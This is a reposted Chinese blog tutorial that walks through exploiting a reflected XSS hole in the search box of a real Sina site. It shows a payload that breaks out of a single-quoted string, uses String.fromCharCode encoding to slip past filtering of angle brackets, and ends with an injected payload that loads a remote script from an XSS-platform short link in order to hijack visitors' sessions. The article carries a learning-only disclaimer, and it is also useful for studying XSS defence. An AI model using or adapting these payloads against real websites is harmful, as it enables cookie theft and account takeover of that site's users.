最新消息:
    你的位置:jinglingshu的博客 > xss知识 > 从新浪XSS漏洞浅谈XSS技巧

    从新浪XSS漏洞浅谈XSS技巧

    xss知识 admin 1832浏览 0评论

    随着网络时代的飞速发展,网络安全问题越来越受大家的关注。当年杀遍大江南北的SQL注入攻击也随着各种防注入软件、waf或者CDN的出现开始慢 慢离我们而去。一种非实时的攻击手段XSS跨站脚本攻击逆流而上,慢慢的开始在最近几年崛起,充分印证了“没有绝对的安全”这句话。

    本文通过对新浪某分站的XSS漏洞向大家简述一些XSS漏洞的利用技巧,希望大家能有所收获。

    XSS攻击:允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。SQL注入漏洞有很多技巧可以使用,在XSS攻击中也有很多技巧。

     

    作者:小鸟

    习科ID:zhj527641718

    本身咱挺喜欢买彩票的,刚好有一天发现有新浪彩票这玩意,就顺便开看看。

     

     

    在我截图的页面这里发现有一处搜索的地方,我在逛wooyun也曾经看到有很多大牛都在新浪,百度,和TX上挖XSS漏洞,我虽然不挖洞,不过直觉告诉我这里肯定有洞,于是便有了下文中总结的XSS漏洞的一些技巧。

     

    目标:新浪爱知识人

    工具:chrome,F12调试工具   {{{{@__@}}} 小编表示只会用IE的F12}

    在页面中随手输入N个a,再用chrome下的F12可以看到

     

     

    在input下的value存放了我输入的aaaa,然后以双引号”结束value取值。

    如果input的type是text,那么value就是这个输入框里的值,输入框里是aaaaa,那么value也是aaaaa。既然页面中存放的value是输入框的取值,那么就来测试一下双引号”是否过滤。

    如果没有咱就可以直接给他加事件,例如:

    <span class="pln">aaaaa</span><span class="pun">"</span><span class="pln">onclick</span><span class="pun">="</span><span class="pln">javascript</span><span class="pun">:</span><span class="pln">alert</span><span class="pun">(</span><span class="pun">'</span><span class="pln">x</span><span class="pun">'</span><span class="pun">)"</span>

    很可惜的是结果为过滤了,服务器显然把”给转换了。那就继续打开调试用具F12往下找。

    在调试器里按ctrl+F,发现有4处aaaaa的位置:

     

     

    下面具体来看看这四处到底在页面的什么地方。这里就不贴图了,直接说明。

    第一二处为:value=”aaaaaaaa” 第三处:a href=”URL+aaaaa” 关键的地方在于第四处:

    <span class="pun">&lt;</span><span class="pln">script</span><span class="pun">&gt;</span>
<span class="kwd">function</span><span class="pln"> thisinit</span><span class="pun">()</span>
<span class="pun">{</span>
<span class="pln"> $</span><span class="pun">(</span><span class="str">"syzs1"</span><span class="pun">).</span><span class="pln">value </span><span class="pun">=</span><span class="lit">50</span><span class="pun">-</span><span class="pln"> document</span><span class="pun">.</span><span class="pln">login</span><span class="pun">.</span><span class="pln">title</span><span class="pun">.</span><span class="pln">value</span><span class="pun">.</span><span class="pln">length</span><span class="pun">;</span>
<span class="pln"> $</span><span class="pun">(</span><span class="str">"syzs2"</span><span class="pun">).</span><span class="pln">value </span><span class="pun">=</span><span class="lit">3000</span><span class="pun">-</span><span class="pln"> document</span><span class="pun">.</span><span class="pln">login</span><span class="pun">.</span><span class="pln">description</span><span class="pun">.</span><span class="pln">value</span><span class="pun">.</span><span class="pln">length</span><span class="pun">;</span>
<span class="pln"> getTitleContent </span><span class="pun">(</span><span class="str">'aaaaaaaa'</span><span class="pun">,</span><span class="str">'0'</span><span class="pun">);</span>
<span class="pln"> getTitleClass</span><span class="pun">(</span><span class="str">'0'</span><span class="pun">);</span>
<span class="pln"> autotenms</span><span class="pun">();</span>
<span class="pun">}</span>
<span class="kwd">if</span><span class="pun">(</span><span class="pln">window</span><span class="pun">.</span><span class="typ">Event</span><span class="pun">)</span><span class="pun">{</span>
<span class="pln"> window</span><span class="pun">.</span><span class="pln">onload </span><span class="pun">=</span><span class="pln"> thisinit</span><span class="pun">();</span>
<span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span>
<span class="pln"> setTimeout</span><span class="pun">(</span><span class="pln">thisinit</span><span class="pun">,</span><span class="lit">100</span><span class="pun">);</span>
<span class="pun">}</span>
<span class="pun">&lt;/</span><span class="pln">script</span><span class="pun">&gt;</span>

     

    注意看line6的代码:服务器把客户端递送的值作为字符串传入了getTitleContent中,并且单引号引起。

    上面双引号已经过滤了,那就试试单引号,测试语句:aaaaaaaa’Aaaaa

    顺便解释一下为什么要这样写,好吧我承认首先是aaaa很顺手,然后中间单引号作为测试,因为单引号不大,而且在F12调试器中很模糊,所以后面继续加 aaaaa更明显一些。在JS的字符串在调试器中是红色,函数是为黑色,注释是为绿色,这样很容易看清,不会误判操作,小细节而已。

     

     

    在这里就能看得很清楚,是Aaaaa为黑色,简单明了的证明单引号 ‘ 没过滤,浏览器把的aaaa作为函数运行结果不成立,从而导致报错。

    既然已经知道单引号’没过滤,继续测试,执行alert(‘a’)弹个窗试试好了。

     

     

    测试结果是成功弹出a。

    解释一下这行语句:

    <span class="pln">getTitleContent </span><span class="pun">(</span><span class="str">'aaaaaaaa'</span><span class="pun">+</span><span class="pln">alert</span><span class="pun">(</span><span class="str">'a'</span><span class="pun">)+</span><span class="str">'Aaaaa'</span><span class="pun">,</span><span class="str">'0'</span><span class="pun">);</span>

    首先拿一个例子说明:

    <span class="pun">&lt;</span><span class="pln">script</span><span class="pun">&gt;</span>
<span class="kwd">var</span><span class="pln"> a</span><span class="pun">=</span><span class="str">'q'</span>
<span class="kwd">var</span><span class="pln"> b</span><span class="pun">=</span><span class="str">'d'</span><span class="pun">+</span><span class="pln">a</span><span class="pun">+</span><span class="str">'e'</span>
<span class="pln">alert</span><span class="pun">(</span><span class="pln">b</span><span class="pun">)</span>
<span class="pun">&lt;/</span><span class="pln">script</span><span class="pun">&gt;</span>

    这个结果中会弹出dqe,符号“+  +”在JS中是带有连接的作用,所以js代码执行的时候是这样的:

    首先创建a并赋值字符串“q”,然后再创建函数b并赋值字符串“d”,将把a的值连接在字符串“d”的后面,最后再赋值字符串“e”。最后弹窗就是dqe。

    理解到这里应该就明白了  getTitleContent (‘aaaaaaaa’+alert(‘a’)+’Aaaaa’, ‘0’);  的意思。

    首先aaa为字符串,并且用单引号结束,然后连接语句alert,最后再进行赋值aaaa。当然最后面也可以不赋值,按个人习惯吧。

    既然已经知道服务端没有过滤单引号 ‘ ,那么直接来调用JS。首先还是个测试语句。

    <span class="pln">document</span><span class="pun">.</span><span class="pln">write</span><span class="pun">(</span><span class="str">'&lt;script src='</span><span class="pln">http</span><span class="pun">:</span><span class="com">//silic.org'&gt;&lt;/script&gt;');</span>

    不过运行结果是这样的:

     

     

    发现页面中除了双引号,尖括号也被过滤掉了。那就把调用的js用ascii编码一下,变成:

    <span class="pln">document</span><span class="pun">.</span><span class="pln">write</span><span class="pun">(</span><span class="typ">String</span><span class="pun">.</span><span class="pln">fromCharCode</span><span class="pun">(</span><span class="lit">60</span><span class="pun">,</span><span class="lit">115</span><span class="pun">,</span><span class="lit">99</span><span class="pun">,</span><span class="lit">114</span><span class="pun">,</span><span class="lit">105</span><span class="pun">,</span><span class="lit">112</span><span class="pun">,</span><span class="lit">116</span><span class="pun">,</span><span class="lit">32</span><span class="pun">,</span><span class="lit">115</span><span class="pun">,</span><span class="lit">114</span><span class="pun">,</span><span class="lit">99</span><span class="pun">,</span><span class="lit">61</span><span class="pun">,</span><span class="lit">39</span><span class="pun">,</span><span class="lit">104</span><span class="pun">,</span><span class="lit">116</span><span class="pun">,</span><span class="lit">116</span><span class="pun">,</span><span class="lit">112</span><span class="pun">,</span><span class="lit">58</span><span class="pun">,</span><span class="lit">47</span><span class="pun">,</span><span class="lit">47</span><span class="pun">,</span><span class="lit">119</span><span class="pun">,</span><span class="lit">119</span><span class="pun">,</span><span class="lit">119</span><span class="pun">,</span><span class="lit">46</span><span class="pun">,</span><span class="lit">113</span><span class="pun">,</span><span class="lit">113</span><span class="pun">,</span><span class="lit">46</span><span class="pun">,</span><span class="lit">99</span><span class="pun">,</span><span class="lit">111</span><span class="pun">,</span><span class="lit">109</span><span class="pun">,</span><span class="lit">39</span><span class="pun">,</span><span class="lit">62</span><span class="pun">,</span><span class="lit">60</span><span class="pun">,</span><span class="lit">92</span><span class="pun">,</span><span class="lit">47</span><span class="pun">,</span><span class="lit">115</span><span class="pun">,</span><span class="lit">99</span><span class="pun">,</span><span class="lit">114</span><span class="pun">,</span><span class="lit">105</span><span class="pun">,</span><span class="lit">112</span><span class="pun">,</span><span class="lit">116</span><span class="pun">,</span><span class="lit">62</span><span class="pun">))</span>

    然后再继续测试

     

     

    于是乎在下面成功调用了远程的JS。

    在这里提示一个问题,这里我是用gainover写的XSS转换器转换的,发现当页面调用的时候会加上一个\这样的斜杠。最后结果就变成了这样<\/script>。所以用的时候先把倒数第一个92给删掉,然后再运行。

     

     

    从XSS平台里面拿出缩进地址http://x.co/1KKP5并进行转码,插入到搜索栏里:

    <span class="pln">aaaaa</span><span class="str">'+document.write(String.fromCharCode (60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,120,46,99,111,47,49, 75,75,80,53,39,62,60,47,115,99,114,105,112,116,62))+'</span><span class="pln">aaa</span>

     

    最后看图:

     

     

    *作者注:本文只限学习和技术研究,旨在提醒广大程序员注意全面的防范xss漏洞,不得做模仿和侵犯他人利益的行为(出于安全和隐私的考虑,小编已经将本帖中涉及储存型相关技术细节隐去)。

    //Silic.Org

    转自:http://silic.org/post/xss_skills_in_sina_iask_search

     

    转载请注明:jinglingshu的博客 » 从新浪XSS漏洞浅谈XSS技巧

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址